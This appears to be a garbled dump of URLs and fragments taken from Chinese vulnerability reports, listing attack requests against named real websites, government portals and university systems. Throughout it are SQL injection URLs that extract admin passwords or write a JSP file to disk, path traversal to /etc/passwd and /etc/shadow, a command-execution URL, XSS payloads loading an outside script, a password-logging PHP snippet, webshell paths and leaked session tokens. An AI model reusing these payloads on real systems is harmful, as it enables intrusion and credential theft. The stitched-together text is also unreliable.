http://www.hnzzgas.com/showNews!show.action?id=5a9c84bd3b6fa907013b744931bf0002 http://www.quamnet.com/index.action http://terminal.chinaef.com/system/logout.action http://www.china-sss.com/airOrder/PrintTravelList?ohId=60514911 http://www.tsinghuait.com/1.txt http://music.dangdang.com/project/music/hosts/ajax_proxy.php http://music.dangdang.com:80/ music.dangdang.com/&ques_type=-1&action=research_submit http://i.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe307&bulletinId=6ed7ae09-4917-11e2-bd5e-f59a5e283c39 site:edu.cn/login.portal http://jyxt.njmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe166&bulletinId=0204fb6f-acc2-11e2-b688-d7c5445b1895 http://yx.nuaa.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe1281&bulletinId=ef106386-dc48-11e1-bdbe-f3e4bab85510 http://yx.urp.seu.edu.cn/detach.portal?.pen=pe85&.pmn=view&action=bulletinBrowser&bulletinId=60d6dec1-c3eb-11e0-8757-d1822bab2551 http://tj91.tongji.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe381&bulletinId=1036c7dd-8c3f-11e2-8af4-afebc6a315bc http://student.tongji.edu.cn/detach.portal?.pen=pe521&.pmn=view&action=articleDetail&bulletinId=2b685df4-76c1-11df-ba54-c9b78d6240e6 http://zcc.tongji.edu.cn/detach.portal?.pa=aT1QNzY1MDYzJnQ9ciZzPW1heGltaXplZCZtPXZpZXc%3D&viewaction=viewdetail&fei=2566&group_id=41&pagenum=1&num=5&level=0 http://jy.nbu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe824&bulletinId=6ad7e021-b846-11e2-8fb4-65aa1f1026a8 http://jy.gdufs.edu.cn/detach.portal?.pen=pe127&.pmn=view&action=bulletinBrowser&bulletinId=fe052ebd-c121-11e2-82f4-b16f6341ecbe http://yx.tmu.edu.cn/detach.portal?.pen=bulletinBrowser&.pmn=view&action=bulletinBrowser&bulletinId=46e38c49-db80-11e1-934e-53cf096a819c http://portal.uestc.edu.cn/detach.portal?action=bulletinBrowser&.ia=false&.pmn=view&.pen=pe2421&bulletinId=ebc9dbfb-e48d-11de-a17b-ebe083a9498a%20and%201=1 
http://regi.ustc.edu.cn/detach.portal?.pen=pe38&.pmn=view&action=bulletinBrowser&bulletinId=698chttp://welcome.htu.edu.cn/detach.portal?.pen=bulletinBrowser&.pmn=view&action=bulletinBrowser&bulletinId=01739eec-b11c-11e0-a9c9-035c06e14b9b'5e93-9507-11de-b121-9b861b679231 http://movie.dangdang.com/project/movie/hosts/ajax_proxy.php http://movie.dangdang.com:80/ movie.dangdang.com/&ques_type=-1&action=research_submit http://365jia.cn/uploads/13/0529/51a62071dfd17.php http://www.4008123456.com/tclcc/portlets/examine/begin.do?form_id=1 http://www.zhenguoli.com使用的是phpcmsv9整站,服务器环境apache,导致可以getshell http://125.93.53.88/jmx-console/ http://125.93.53.88/jmx-console/ http://125.93.53.81:8081/jmx-console/ http://kfcrm.inc.hc360.com/member_manage/member_service_list.aspx?member_id=zjcsmj88 http://www.100tong.com.cn//plus/search.php?keyword=as&typeArr[111%3D@`\ http://gvshs5cs.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://www.dangdang.com/default_json_file_2012.php?area_num=/../..//../..//../..//../..//../..//etc/passwd%00&area_name=L3&screensize=1920&t=0.002583379581056311 http://www.dangdang.com:80/ www.dangdang.com http://mmme.me/xss.js http://trade.jd.com/consignee/saveConsignee.action http://mmme.me/xss.js http://trade.jd.com/payAndShip/savePayAndShip.action http://gate.jd.com/InitCart.aspx?pcount=100000000&ptype=1&pid= http://www.pcbpartner.cn/ http://www.cce.fudan.edu.cn/admin/Login.asp www.ecshop.cn http://dev.wanda.cn/demo/ http://ctcc.com.cn/admin/admin/index.aspx http://ctcc.com.cn/images/list.asp http://www.4008040080.com/index.php/Content/Index/show/catid/%24%7B%40print%28md5%28admin%29%29%7D/id/__THEME__ www.vipidc.com http://2011.vipidc.com/loadIndex.action mailto:aa@aa.com,此时选择由chrome打开 http://211.139.140.14/TMS/dorado/access.login.d http://www.gm.cdut.edu.cn/Query/Scscjcx/ http://cloud.sccl.cn:8499/admin/getAllSysDeptsWithDomainIsNotNull.action 
http://cmsdt.xdf.cn/getabroad.php?typeid=4422 http://cmsdt.xdf.cn/getclassinfo.php?typeid=4423 http://app.test.xdf.cn/getabroad.php?typeid=4504 http://region1.cei.gov.cn/ http://region1.cei.gov.cn/panel/admin/add_user.aspx http://localhost/panel/ckfinder/ckfinder.html) http://chuangshi.qq.com/read/Novel/forum/cid/3408 http://chuangshi.qq.com/read/novel/forum/cid/3408.html http://58.83.206.86/ http://58.83.206.148/ http://58.223.251.6:8080/cwmp/index.jsp http://58.223.251.6:8080/vip/index.jsp http://58.223.251.6:8080/emportal/index.jsp http://58.223.251.6:8080/wap/ http://58.223.251.6:8080/opportal/index.jsp http://58.223.251.6:8080/opportal/index.jsp http://58.223.251.6:8080/download/files/3.05.01.zip http://www.njkdw.com/abc/672.html http://cms.sohu.com/index/view.action http://www.sctvgo.com http://www.sctvgo.com/productlist.aspx?cid=12&l=2 http://aobo.tcl.com http://aobo.tcl.com/leftabout.asp?id=2 http://aobo.tcl.com/leftdy.asp?id=27 http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://t.stat.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://anerle.youku.com/admin/left.php http://ninjiom.youku.com/ http://passport.soku.com/user/logout?__callback=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://softcoreonline.huawei.com/front/faq!list.action http://www.china-safety.org/system_dntb/uploadFile.aspx http://www.china-safety.org/system_dntb/Advanced.aspx,使用firebug即可修改允许上传类型,这里已经被人修改过,添加了aspx类型,所以可以直接上传大马。 http://www.2cto.com/Article/201304/206536.html cookie:UserType=0 http://www.china-safety.org/system_dntb/upload/con2.aspx http://www.china-safety.org/system_dntb/upload/con2.asp http://www.china-safety.org/system_dntb/upload/2013110125222650.aspx www.ejobmart.cn,大概有jboss控制台泄露、sqli、xss问题 http://www.ejobmart.cn/jmx-console/ http://www.ejobmart.cn/web-console/ www.ejobmart.cn/workguide.html?columnid=185 http://www.ejobmart.cn:80/enterpriseinfo.html?unitid=CF7217F846C8ABBAE04010AC14976315 
http://gd.10086.cn/surveypage/upload.jsp http://apps.2012.qq.com/guess/list-tid--stat-4?sort=desc,if%28%281=1%29,1,%28select/**/1/**/from/**/INFORMATION_SCHEMA.TABLES%29%29%20asc http://apps.2012.qq.com/guess/list-tid--stat-4?sort=desc,if%28%281=2%29,1,%28select/**/1/**/from/**/INFORMATION_SCHEMA.TABLES%29%29%20asc www.mjceo.com http://218.77.176.133/broadband2/login.jsp http://app.gh.qq.com/ http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxxx&type=2&gamearea=327,320,&rd=0.8207729268233043 http://app.gh.qq.com/cgi-bin/v1/guild/cgi_set_guild_base.cgi?iGuildID=xxx&type=2&gamearea=327,'%2b http://ketang.weibo.com/sort/price/list_1/98.html?keyWord= http://ketang.weibo.com/sort/price/list_1/98.html?keyWord=%27/**/and/**/%27%27=%27 http://www.zsb.pudong-edu.sh.cn/CenterWeb/czzs/Info.asp?id=1208 http://ba.72dns.com/checkyms.php这个地 http://ba.72dns.com/checkyms.php?c:\windows\system32\cmd.exe http://ba.72dns.com/checkyms.php?E:\webhost\ba.72dns.com_mfiaiead\www\include/config.inc.php http://www.xian3g.com/p/n.aspx?Id=2997&ColId=120&ModelId=1 http://www.xian3g.com/P/td.aspx?ProductId=67 http://bang.dangdang.com:80/mall/bestSeller/index.php http://bang.dangdang.com/ajax_proxy.php,就不截图了。 www.cdtrp.com),发现开放MySql3306端口。 http://url.cn/IWEUUc http://t.cn/zHcmIaJ http://t.sohu.com/twAction/insertTwitter http://album.zhenai.com/register/register.jsps http://setv.com.cn/xgdh/videoshow.asp?id=32 http://si.cnc.cn/rss2.jsp?cid=1 ftp://xx.com/upload/payload.html ftp://xx.com/upload/payload.html http://xx.com/upload/xss.html http://xx.com/upload/xss.html ftp://username:passworld@xx.com/upload/payload.html http://202.106.182.172/b.php rv:21.0 http://localhost/espcms_utf8_5.6.13.04.22_b/upload/index.php?ac=membermain&at=editinfo http://www.holley.cn/news_detail.php?cid=31&id=266 http://cache.sina.com.cn/admin/index.php http://qdev.sina.com.cn/admin/index.php http://www.7g8g.com/joy/admin/index.php http://weibo.cn/?gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9 
http://bbs1.sina.cn/dpool/bbs/profile.php?uid=1414150877&pm=mil-2-604059-viewthread&gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9&PHPSESSID=c814a4c9250d6c0f106cc8b12195ab39 http://vip2.weibo.cn/member/pay?F=W_hyzx&gsid=4uKI41461Sgqnu7BbJ0lW5VSSe9 http://www.hnair.com/ http://www.mod.gov.cn/ www.yantai.gov.cn http://try.suning.com/ReportList.html?c=母婴 http://try.suning.com/reportlist/2.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/3.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/4.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/6.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/5.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/7.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/reportlist/296.html?c=%e6%af%8d%e5%a9%b4 http://try.suning.com/trylist.html?c=母婴 http://try.suning.com/history.html?c=母婴 https://124.205.79.78/ vpn.cnu.edu.cn/sub_ca.php https://IP/minica_down.php https://vpn.bit.edu.cn/ https://sslvpn.bjtu.edu.cn/ https://125.46.88.100/ https://219.80.0.19/p https://info.nai.edu.cn/ https://124.205.79.78/ https://210.82.53.201/ https://vpn.cnu.edu.cn/ https://vpn.mcut.edu.tw/ https://ac.whlib.gov.cn https://sslvpn.nhcue.edu.tw https://isms.ydu.edu.tw/ https://sslvpn.ydu.edu.tw/ https://vpn.cute.edu.tw https://sslvpn.ntue.edu.tw https://vpn.psi.com.tw https://maltimur.jksm.gov.my/ https://vpn.ccom.edu.cn https://vpn.dlmu.edu.cn https://vpn.wanfang.edu.cn https://vpn.genius.com.cn https://sslvpn.changhongit.com https://vpn.jnrd.com.cn https://sslvpn.kworld.com.tw https://www.oo586.com/ https://svpn.mbatec.com.tw https://sslvpn.szs.com.tw https://sslvpn.gzcatv.net https://e.nais.net.cn https://vpn.thcic.cn https://vpn.pku.edu.cn/ https://vpn.cau.edu.cn/ https://sh-vpn.o2micro.com https://bj-vpn.o2micro.com https://cd-vpn.o2micro.com https://218.26.21.194/ https://218.26.7.112/ https://220.178.250.102/ https://vpn.hnuu.edu.cn/ https://222.75.160.120/ https://60.191.18.54/ https://61.191.18.137/ https://218.22.51.114/ 
https://183.166.187.156/ https://oa.qzbsg.gov.cn https://www.smfgny.com https://cbj.1203.org https://58.54.252.40 https://218.24.94.244 https://219.141.234.54/ https://vpn.cdc.com.cn https://58.242.162.242/ https://116.236.137.18/ https://oa.qzbsg.gov.cn/ https://122.225.14.154/ https://60.191.18.54/ https://125.65.179.230/ https://www.scxjrz.com/ https://vpn.tgsh.ttct.edu.tw/ https://ssl.qztc.com/welcome.php https://oa.chnmuseum.cn/ https://218.62.26.250/ https://219.143.243.103/ http://127.0.0.1/espcms/adminsoft/index.php?archive=templatemain&action=templateedit&dir=../&filename=index.php&type=edit&freshid=0.41100375866517425&iframename=jerichotabiframe_0&iframeheightwindow=617&iframewidthwindow=1430 http://www.chinamil.com.cn/ http://www.hntax.gov.cn/hntax/admin/ewebeditor_hntax_10/admin/login.jsp http://live.sina.cn/dpool/sports/live/live.php?match_id=2013042901&autoref=stop&oid=sina&vt=4 http://115.com/zone/static/js/Wo/WO.js http://www.jiuxian.com/web.php?c=user&m=info&suc=1#tabs-2 t.cn/xxxxxx http://webgps.tjsjwd.com/ http://webgps.tjsjwd.com/ http://www.jiuxian.com/web.php?c=user&m=address&addr_id=484740 http://login.jingwei.com/resetPass?email=邮箱地址&vc=a05e9dd6-e64d-4a5a-9364-60499d78c9aa http://login.jingwei.com/resetPass?email=邮箱地址&vc=a05e9dd6-e64d-4a5a-9364-60499d78c9aa http://monitor.hbepb.gov.cn/EPS/tEpInfoReg/login_post_itemTypeId=88952634&loginName=88952634&loginPwd=88952634 http://research.gtja.net:8081/logon.action http://www.jiuxian.com/web.php?c=login&m=get_pwd http://www.xhqsjz.gov.cn/gkdh_list.aspx?mingcheng=ddd http://shop.zte.com.cn/main/mobile/shop_mobilemateriel.jsp?queryName=1 http://shop.zte.com.cn/welcome.com http://diaocha.www.edu.cn/diaocha/vote.php http://liuxuenote.eol.cn/admin/login.php site:zhihu.com inurl:php http://my.115.com/?ct=account&ac=update_user_info&form%5Buser_name%5D=xxxxxx http://www.baidu.com/s?wd=%22%3E%3Ciframe%20src=//www.0563.org.cn%3E&TN=baidulocal http://www.wrcb.com.cn/ 
http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php http://220.231.41.220:1000/cgi-bin/php-cgi/html/svpn.php https://61.163.104.181:4430/cgi-bin/php-cgi/html/svpn.php http://sslvpn.cifi.com.cn:1000/cgi-bin/php-cgi/html/svpn.php http://60.216.53.122:1000/cgi-bin/php-cgi/html/svpn.php http://222.85.86.119:1000/cgi-bin/php-cgi/html/svpn.php http://218.29.139.76:1000//cgi-bin/php-cgi/html/svpn.php http://wooyun.org/bugs/wooyun-2010-017323 http://big5.tcl.com/DRP/ http://crm.tv.tcl.com/DRP/ http://www.hik-online.com,漏洞在于此总台目录过滤不严,泄露用户登陆地址,导致弱口令登陆。账号admin url:http://rs3.bbs.itc.cn/v201305291556/?q=/../../../../../../../../../../../../etc/passwd http://manage.club.sohu.com/muser/login http://www.cepca.org.cn http://www.cepca.org.cn/download/download.aspx?filepath=/cns/../web.config&filename=web.config http://dlzj.cec.org.cn http://dlzj.cec.org.cn/DownLoad.aspx?filePath=/web.config&fileName=web.config http://www.anquan.org/seccenter/appeal_verify/ http://uems.sysu.edu.cn/jwxt/ http://www.pengpengmall.com/data/repeat_user.php http://www.aegon-cnooc.com/ http://service.aegon-cnooc.com/AEGON_GIS/loginAction.do http://www.xmjj.gov.cn/xxfw/dwr/call/plaincall/YzAction.getValidate.dwr http://www.xmjj.gov.cn/xxfw/register.action http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/@@datadir,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=test'and/**/1=2/**/union/**/all/**/select/**/'test',2,3,4,5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp'/**/from/**/mysql.user/**/limit/**/1%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc http://vip.youku.com/account/trade.html http://vip.youku.com/ajax/tradedetail.html?trade_id=3 http://openresearch.baidu.com/member/message_read.jspx?id=500&&box=1 
monitor.cern.ac.cn/login.html‎ www.uipower.com http://www.uipower.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../phpsso_server/caches/configs/database.php http://www.uipower.com/phpsso_server/phpcms/libs/classes/model.class.php http://vckbase.com/accman.php/Public/login http://lefen.lenovo.com/index.php/pph/see/-26%20union%20select%201,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,3,load_file%280x2F6574632F706173737764%29,5,6,7,8,9,10,11,12,13,14 http://lri.cas.cn/dzz/mis3/article.jsp?type=9 http://lri.cas.cn/dzz/mis3/login.jsp http://shadu.baidu.com/feedback/add http://jwc.ccit.edu.cn/third/show_jxtg.asp?id=230 Google:intext:Genie intitle:Genie https://tpa-atm1.dyxnet.com http://3gw.asia http://3gw.asia/Template/1.asp http://e960.com/plus/search.php?keyword=as&typeArr[111%3D@`\ http://clab.e3861.com/admin/admin_user.asp http://clab.e3861.com/登陆,登陆之后可以查看到用户的敏感的信息 http://clab.e3861.com/说明.txt http://clab.e3861.com/admin/ http://kmfsy.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''= szyx.hnust.edu.cn/xg/ https://portal.hnust.edu.cn:8443/cas/login?service=http%3A%2F%2Fszyx.hnust.edu.cn%2Fxg%2Fapplication%2Fmain.jsp# http://211.67.208.69/kdjw/xscjcx.jsp?yzbh=1201010101 https://portal.hnust.edu.cn:8443/cas/mail/check.jsp http://119.10.114.223 http://119.10.114.148 http://www.whhome.gov.cn/sgo/egs/site/cga/project/projectNet-list.action http://218.94.1.82/biology/loginAction.action江苏省疫苗管理信息系统 http://www.cjdao.com/jrssfund/fundFrontAction.action http://www.theskinfoodus.com/Product/product_list.asp?cate=1%7C4 http://www.theskinfoodus.com/skinfood/tv.asp?movieid=120&page=1&SF_Part=&SF_KeyWord= http://theskinfoodus.com/news/news_view.asp?boardcd=100&PK_NUM= http://210.43.128.216:8080/UMC/Login!start.action http://www.test.kingdee.com/article/blog.action 
http://ip/EnjoyRMIS_Client/msg/webfm/fmNewMsgList2.aspx?Popup=true&PB=true&LoginUserno=工号 http://i.youku.com/u/friends/follow_325973?__rt=1&__ro= http://i.youku.com/u/friends/follow_UMTMwMzg5Mg==?__rt=1&__ro= PS:ID是湖南电视台 http://221.224.77.214:8081/wsdg_suzhou/ http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm rv:15.0 http://221.224.77.214:8081/wsdg_suzhou/ctsBusSearch.do?formname=ctsBusSearchForm http://124.227.190.155/Home/RegInput http://124.227.190.155/ http://124.227.190.155/ http://www.jghq.gov.cn/ http://www.jghq.gov.cn/download.jsp?fileName=../../../../etc/shadow http://www.hbipo.gov.cn/ http://2.zbsjzd.org.cn/ http://www.hbipo.gov.cn/download.jsp?fileName=../../../../etc/shadow http://2.zbsjzd.org.cn/download.jsp?fileName=../../../../etc/shadow http://cloud.xuntongnet.com/ http://www.chinatietong.com/news/comment.php3?id=13675 http://www.dl.cttln.com/index.php?c=default&a=content&p=1&ic_id=21&id=189 inurl:account.do?method=index http://localhost/serviceTransfer.do?method=transerService http://localhost/client/manage/account/user_manage.jsp http://localhost/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://localhost/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=%2F http://www.jiayuan.com/parties/2011/lechi/lechi_index.php http://scebm.bda.edu.cn/Qtbm!toList.action http://www.bjca.org.cn:8080/XTXUserWeb/readagreement2.action http://www.bjca.org.cn/x.php http://hr.foxconn.com/R_Society/JobInfor.aspx?job_id=J014460 http://www.mypengpeng.com” http://hbcainfo.miibeian.gov.cn/state/outPortal/loginPortal.action http://minisite.youku.com/408/showadd.php?pwd=K0eN6xShoWaDdcH0sH8r http://minisite.youku.com/408/excel.php http://wszw.hzs.mofcom.gov.cn/fecp/portalpubsys/jbhtmledit/dlg_insert_media.jsp http://www.appchina.com/market/berry/search.action?q=9i http://360zs.appchina.com/market-web/banana/soft_main.action 
http://m.appchina.com/market-web/cherry/soft_main.action http://dev.appchina.com/market/dev/index.action http://www.shuaji.net/plus/search.php?keyword=as&typeArr[%20uNion%20]=a javascript:void(0) http://www.shuaji.net//plus/search.php?keyword=as&typeArr[111%3D@`\ http://www.cuplfil.com/systemmanage/login.asp http://www.zset.gov.cn/content.php?news_id=22690 http://www.zset.gov.cn/content.php?news_id=22690 http://www.docin.com/touch/detail.do?id=231298242&isDoc=0 http://gdcnc.voole.com/movie.action?id=19024 Global:RequestCaptainLearnSkill http://yunying.htinns.com:38000 http://yunying.htinns.com:38000/IBX.php http://allyes.nie.163.com/main/adftrack?db=afanie&url=//www.wooyun.com http://bmj.hunan.gov.cn/newssearch.aspx?searchKey=1 http://www.jcjob.cn/xlbys.action http://www.66call.com/help_info.aspx?Id=14 http://sdn.kugou.com/link.aspx?id=3480&url=http://t.k618.cn/url/lz3 IP:202.70.2.55 http://v9.demo.phpcms.cn/index.php?m=attachment&c=attachments&a=swfupload_json&src='%20and%20 http://v9.demo.phpcms.cn/index.php?m=pay&c=spend_list http://qcwap.xjwxcs.com/see!init.action www.jiuxian.com,另一个登录m.jiuxian.com,分别下一个订单; www.jianxian.com下的用户订单; http://m.jiuxian.com/order/cancel/1798433 www.jianxiu.com域名下刷新用户订单页面,发现已经被成功取消; http://jiu.sohu.com/searchprice.php?q=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://product.news.sohu.com/news/hooscargame/pt_main.php?photourl=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E http://zhuanti.club.it.sohu.com/back.php http://zhuanti.club.it.sohu.com/icons/ http://passport.zte.com.cn/editorial/ztecn/ch/author/check_user.aspx?user_name= http://mobilerma.zte.com.cn/rma/Portal/index.jsp?country= http://127.0.0.1/espcms/adminsoft/index.php?archive=management&action=syssetting&listfunction=syssetting&groupid=&iframeheightwindow=621&iframewidthwindow=1430 
http://127.0.0.1/espcms/adminsoft/index.php?archive=advertmain&action=advertadd&atid=1&type=add&freshid=0.8400494705419987&iframename=jerichotabiframe_0&iframeheightwindow=621&iframewidthwindow=1245 com.renren.ntc.fm/shared_prefs/sharedpref_user_session_key.xml同样可导致用户信息泄露,全局可写的/data/data/com.renren.ntc.fm/shared_prefs/sharedpref_user_access_token.xml会导致拒绝服务攻击,其他应用可以写入此文件覆盖掉用户的token。其他可读写文件的影响就不再赘述。 com.renren.ntc.fm/shared_prefs/sharedpref_user_access_token.xml com.renren.ntc.fm/shared_prefs/sharedpref_user_session_key.xml http://pan.baidu.com/share/link?shareid=3699376066&uk=456103769 http://bbs.olyouxi.com/api/manyou/ecshop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF http://www.icinfo.com.cn/html/icbcHomepage.action text:300CEFF2 text:300CEFF2 text:300CEFF5 ds:FlushFileBuffers text:300CEFFB text:300CEFFE ds:DisconnectNamedPipe text:300CF004 text:300CF007 ds:CloseHandle text:300CF00D text:300CF010 text:300CF012 text:300CF015 text:300CF017 text:300CF019 text:300CF01B text:300CF020 text:300CF022 text:300CF022 text:300CF022 text:300CF022 text:300CF025 text:300CF02C text:300CF02C text:300CF02C http://www.gomesell.com/ http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php text:300CFA78 text:300CFA78 text:300CFA7B ds:FlushFileBuffers text:300CFA81 text:300CFA84 ds:DisconnectNamedPipe text:300CFA8A text:300CFA8D ds:CloseHandle text:300CFA93 text:300CFA96 text:300CFA98 text:300CFA9B text:300CFA9D text:300CFA9F text:300CFAA1 text:300CFAA6 text:300CFAA8 text:300CFAA8 text:300CFAA8 text:300CFAA8 text:300CFAAB text:300CFAB2 http://www2.jxvtc.edu.cn:80/2009_rcpy.asp?id=54 http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://www0.ceair.com/muecard/pages/system/login/mainFrame.jsp http://jgp.ceair.com/JGP/Web/GYSWBJK/Login.aspx?F_DWID=1400 http://operation.ceair.com:9001/OperationQA/criterion.access.d 
http://union.ceair.com/web/resetpassword.aspx?loginuser=610323198808081693 http://127.0.0.1/dede/install/index.php?insLockfile=1 http://newscms.house365.com/newCMS/login.php http://61.baidu.com/content.php?sid=391 http://www.anta.com.cn/en/home.php?option=4&Itemid=146015 http://www.anta.com.cn/en/home.php?option=4&Itemid=146015 http://www.chinatietong.com/news/comment.php3?id=13777 http://tvkuan.com/ background-image:expression http://pay.youku.com/ajax/verifytrade.html?tid=3 http://pay.youku.com/buy/result.html?r=s&tid=3&sign=e7974c0f8a51b225c88792736b501f3d http://edu.ata.net.cn/StudentsCenter/LoginInfoDetail.aspx?flog=question&id=16 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891 http://zgsccp.org/info.asp?id=4891%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20admin http://zgsccp.org/info.asp?id=4891%20union%20select%201,admin,3,password,5,6,7,8,9,10,11,12,13%20from%20admin http://oms.womaiapp.com/ http://www.soso.com/cs.q?w=xss http://www.globalpeople.com.cn/s/ckfinder/ckfinder.html?action=js http://tydjt.net/ggxx.asp?id=35 http://yts.yonyou.com/period/PeriodAction_index.do http://220.181.8.134 site:site:yesky.com http://admin.m.yesky.com/jsp/admin/login.jsp http://admin.m.yesky.com/ewebeditor/admin/ http://wap.91ac.com/ http://kfgd.icartoons.cn:8080/help.download?isAbsolute=false&path=WEB-INF/web.xml http://125.77.198.26:9002/channelaccount/login!toLogin.do http://125.77.198.26:9002/channelaccount/download.do?filename=WEB-INF/web.xml javascript:alert(document.cookie) javascript:alert(document.cookie) javascript:alert(document.cookie) http://www.gewara.com/home/sns/othersPersonIndex.xhtml?memberid=40949089 http://www.gewara.com/home/acct/updateFavorInfo.xhtml?tag=%3Cdiv%20onmouseover%3D%22javascript%3Aalert%28document.cookie%29%22%3ECCAV%E5%A4%A7%E5%AD%A6%3C%2Fdiv%3E javascript:window.locarion('上面构造的get请求') 3g.k.sohu.com/api/ mp.wap.sohu.com/api/ 
http://store.95516.net/p_detail.php?seqno=1224 http://www.hrbxzsp.gov.cn/right.jsp http://www.xacg.gov.cn/show.php?id=84&pid=13&cid=7 http://www.aqsj.gov.cn/include/web_content.php?id=2080 http://top.chinaz.com/list.aspx?t=35&baidu=1 http://demo.kaixindian.com/index.php/Yxpl?id=1 http://demo.kaixindian.com/index.php/Yxpl?id=1%20and%201=2%20union%20select%201,2,3,4,5,password,7%20from%20mysql.user http://home.400gb.com/mydisk.php?item=vip&action=pay&viptype=1 http://www.sxhbgz.com/web/window.php?id=94 www.snjgdj.gov.cn/admin/admin_index.asp http://im.e-oicc.com.cn/ www.ccb-life.com.cn www.aegon-cnooc.com http://111.75.198.122/ http://gpsst.lncom.gov.cn:88/LN_GPS/doif/myLogin.jsp http://gps.gpsisp.com/gps/doif/myLogin.jsp http://aud.yonyou.com/php/search.php?keyword=&page=19&tag=1&total_record=943&typeid=1 http://aud.yonyou.com/php/search.php?keyword=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28941058%29%3C%2fScRiPt%3E&page=1&tag=1&total_record=943&typeid=0 http://www.byr.edu.cn/shownews.php?id=884 http://www.ecshop.cn/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20 http://www7.chinatelecom.com.cn/hr/pb/regi.do http://rs.hntelecom.net.cn/hr_external_system/viewRecruitNotice.do?notice_id=25 http://123.139.154.156/showphoneinfo/cardinssuerdetailshow.jsp这个页面未授权访问。 http://i.yinyuetai.com/wb/post/doPost.action?content=aa&picture=http%3A%2F%2Fi.yinyuetai.com%2Fwb%2Fpost%2FdoPost.action%3Fcontent%3Dc%26picture%3Dhttp%253A%252F%252Fi.yinyuetai.com%252Fwb%252Fpost%252FdoPost.action%253Fcontent%253Df%2526picture%253Dhttp%25253A%25252F%25252Fi.yinyuetai.com%25252Ffollow%25252Ffollow%25253Ffriendid%25253D20843262 http://wiki.squid-cache.org/Features/CustomErrors#ERR_.2A_template_codes_for_embedding http://sfocs.sf-express.com/im-client/imclient/selfHelp.action;jsessionid=717E73EB9EFE4CD0CA80F974FB68EA75?temp=1&loginCityId=212&loginProvinceId=7&source=cn&hl=zh_CN&goto2011=2011 http://game2.aiyonet.com/manage http://cms2.tiexue.net/ http://reg.sun0769.com/login.action 
site:url.mail.qq.com”就可以查看腾讯邮箱用户通过网页生成助手发出的邮件内容和发件人信息。 http://cn.bing.com/search?q=site%3aurl.mail.qq.com&go=&qs=n&pq=site%3aurl.mail.qq.com&sc=0-4&sp=-1&sk=&first=11&FORM=PORE http://124.127.168.242:8080/airport/assginCodeForMobile.do?phone=139xxxxxxxx&pagetag=CMCC http://www.kc.sc.sgcc.com.cn/ztgc/login.asp http://www.linktrust.com.cn/robots.txt http://linktrust.com.cn/data/skins/ http://www.linktrust.com.cn//images http://lohas.ehuatai.com/intro?code=4013 http://lohas.ehuatai.com/user/user_list http://lohas.ehuatai.com/user/user_list http://jlsbd.jl.sgcc.com.cn/Inc/ http://jlsbd.jl.sgcc.com.cn/databases/ http://orbs.baidu.com/jstp/34.jhtml http://squirrelmail.org/security/ http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/mime.php?r1=13276&r2=13338&view=patch http://test/?p= xlink:href插入javascript的问题 http://www.w3.org/2000/svg width:700px;height:400px;z-index:101;display:block;margin-top:-400px xmlns:xlink="http://www.w3.org/1999/xlink xlink:actuate="onClick xlink:href="javascript:console.log(/xss/) xlink:href含有javasctipt的漏洞 http://hqgl.hbcit.edu.cn/ http://candou.com http://so.candou.com/?wd= http://i.yinyuetai.com/wb/post/doDelete.action?id=xxxxx http://i.yinyuetai.com/wb/post/doDelete.action?id=16545628 